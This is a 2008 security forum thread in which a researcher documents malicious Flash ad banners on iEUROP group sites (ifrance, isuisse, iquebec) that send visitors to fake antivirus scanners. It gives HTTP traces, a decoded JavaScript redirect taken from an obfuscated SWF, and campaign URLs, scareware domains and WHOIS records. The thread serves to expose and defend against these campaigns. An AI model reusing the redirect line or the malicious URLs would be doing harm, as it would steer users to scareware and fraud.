ifrance has a directory listing and I picked out sites in the "Charme" section this time, followed by the "Arts Culture" listing. Both banners are also present on:
  1. escortanne.ifrance.com
  2. escorte13000.ifrance.com
  3. telechargervraieblonde.ifrance.com
  4. sexyblack.ifrance.com
  5. etc ... ???
The XM Radio malvertizement:
  1. necs2.isuisse.com
  2. sky-musique.ifrance.com
  3. wagnorocx.iquebec.com
  4. jeunesse-de-thieulain.ibelgique.com
  5. etc ... ???
Note: the etc ... ??? is just to "show" that you can pick out about any site and encounter those malverts.
Kimberly
<h4>
iEUROP Group : ifrance - isuisse - ibelgique.com - iquebec.com - iespana.es - iitalia.com
</h4>
Just a demonstration to show how exposed you can be to the malicious banners on the iEUROP group. Pick up a site from the Directory listing and clean your Internet Temporary Files before visiting a website. Date & Time stamp of the visit are visible in the network trace. I have also replaced http with hxxp in order to kill live links.

paysagevirtuel.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://paysagevirtuel.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:05:37 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
Accept-Ranges: bytes
pharmacies-gms.ifrance.com
GET /img/pub/proximogroup/firstchoiceFR_468x60.swf?clickTARGETclickTARGET=_blank&clickTAG=[removed] HTTP/1.1
Accept: */*
Referer: hxxp://pharmacies-gms.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image.ifrance.com
Connection: Keep-Alive
Cookie: BlueLithium=no

HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Accept-Ranges: bytesETag: "1078225941"
Last-Modified: Wed, 12 Mar 2008 16:58:55 GMT
Content-Length: 25040
Date: Thu, 03 Jul 2008 15:17:58 GMT
Server: lighttpd/1.4.18
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://pharmacies-gms.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:20:42 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40
Accept-Ranges: bytes
frankyturf.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://frankyturf.ifrance.com/
x-flash-version: 9,0,47,0~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:31:04 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
Accept-Ranges: bytes
GET /img/pub/proximogroup/firstchoiceFR_468x60.swf?clickTARGET=[removed] HTTP/1.1
Accept: */*
Referer: hxxp://frankyturf.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image.ifrance.com
Connection: Keep-Alive
Cookie: BlueLithium=no

HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Accept-Ranges: bytesETag: "1078225941"
Last-Modified: Wed, 12 Mar 2008 16:58:55 GMT
Content-Length: 25040
Date: Thu, 03 Jul 2008 15:33:45 GMT
Server: lighttpd/1.4.18
pc-universe.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://pc-universe.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginxDate: Thu, 03 Jul 2008 15:39:00 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
Accept-Ranges: bytes
ipodmediapro.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://ipodmediapro.ifrance.com
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:42:02 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40
Accept-Ranges: bytes
I maintain my advice to block ALL advertising content from iEUROP & Co. until we have confirmation that:
  • Steps have been taken to wipe out the malvertizements.
  • Steps have been taken to prevent this from happening again.
Kimberly
<h4>
Special Flash: XM Radio invasion takes over iQuébec’s homepage !!!
</h4>
Instead of regressing, the situation at websites owned by iEUROP get's worse actually. This time I got p0wn3d by XM Radio on iQuébec’s homepage.
IPB Image
Looks like XM Radio got itself a nice part of iEUROP as a ID4 gift. wink.gif
IPB Image
Visitors & owners, stand up and shout !!!
Kimberly
<h4>
A different way to exploit redirects in Flash content
</h4>
A couple of days ago I did mention a shockwave exploit covered by Kaspersky. The technique used below is another example of obfuscated code into Flash files redirecting the victims to fake online scanners.

The homepage contains the usual code to display a Flash banner.
IPB Image
Upon entering the website, the visitor is redirected to a fake online scanner unfortunately.
www.antivirusxp2008.com/sysscan/f8328c13dbee8a7d935617b6b38b0e80/1/
The porn.swf file is very small, only 247 bytes. It simply contains 1 frame and 1 script, no images. The actionscript uses the javascript function getURL("java script: x");
IPB Image
IPB Image
The URL is encrypted / obfuscated as seen below.
IPB Image
Once decoded, the link becomes visible.
window.location = "//www.antivirusxp2008.com/sysscan/f8328c13dbee8a7d935617b6b38b0e80/1/";
Yet another reason to block Flash content ...

Note: Special thanks to crunchtime for the initial link to the swf
Kimberly
<h4>
isuisse.com / ibelgique.com / iquebec.com - Forex AutoPilot
</h4>
A yet unseen, new malvertizement is present on the homepage of isuisse.com, ibelgique.com & iquebec.com. The banner advertises Forex AutoPilot and the creative is belonging to the new generation created with Fuse Kit 2.1.4. This is now the FOURTH malicious banner discovered since June the 12th on websites belonging to the group iEUROP. Just on a site note, the XM Radio malvertizement is also being displayed at isuisse on the portal page. This brings the count up to THREE active malvertizements being served to the visitors!!! Imagine the number of users being redirected to fake online scanners ... Enough is enough, this has to stop.

Screenshots in situ.
IPB Image
IPB Image IPB Image
Banner.
image.ifrance.com/img/pub/servedad/forexautopilot_728x90.swf
IPB Image
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
adoptserver.info/_statis.gif?url=[removed]

windowsxp-privacy.net/?id=198760063
xponlinescanner.com/soft.php?aid=024202&d=3&product=XPA
xponlinescanner9.com/2009/1/freescan.php?aid=77024202
<h4>
xponlinescanner9.com - 72.233.81.106
</h4>
xponlinescanner9.com - 72.233.81.106

Website Title: Antivirus 2009 - Official website
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-01
Expires: 2009-07-01
Updated: 2008-07-01

Name Server: NS1.MYNICK.NAME (has 1,262 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Texas - Plano - Layered Technologies Inc

Whois Record
Domain Name: XPONLINESCANNER9.COM

Creation Date: 01-Jul-2008
Expiration Date: 01-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org

Websites.
  1. antivirus-2009.com
  2. antivirus-database.com
  3. antivirus2009professional.com
  4. prettygreatsex.info
  5. xpantivirusonline.com
  6. xponlinescanner.com
  7. xponlinescanner9.com
Kimberly
<h4>
Cooking.com - Still circulating
</h4>
Banner.
a836.g.akamai.net/m/800/1128/1206982808/network.realmedia.com/RealMedia/ads/Creatives/OasDefault/BCN2008030226_01_Cooking/Cooking_728x90_a.swf
IPB Image
IPB Image
IPB Image
Campaign.
stat-diagnostic-imaging.net/c/index.php?id=SHhGdWdQQXBHeWNhV0lJckdzcHpoPTEyMDY5ODA1NDImcG56Y252dGE9cHVyaXJ5aGVyMQYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=chevelure1&adid=intl
Reported on teamsugar on June 29 th.
Kimberly
<h4>
iEUROP Group : ifrance - isuisse - ibelgique.com - iquebec.com - iespana.es - iitalia.com
</h4>
As stated several times, we don't have any communication with iEUROP thus I'm forced to check back regularly the websites to see if any cleanup has been performed. Today ifrance, isuisse, ibelgique & iquebec seem to have a part of the advertising disabled. The page header with the site logo and advertising space is missing as seen below.
IPB Image
Does this mean they have started the cleanup phase, that they finally decided to move? I have no way to tell. Unfortunately this resolves on a part of the problem since the XMRadio and Forex AutoPilot malvertizements are still being displayed on the main portal of isuisse, ibelgique and iquebec.

This time I have also contacted bluemedia, who is in charge of the advertisements of different websites, by telephone and email. So let's pray that these banners are taken down very soon.

<h4>
cooking.com
</h4>
The cooking.com malvertizement - Ref - has been taken down this night. The server returns a 404 error. Another one fixed.
IPB Image


This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2014 Invision Power Services, Inc.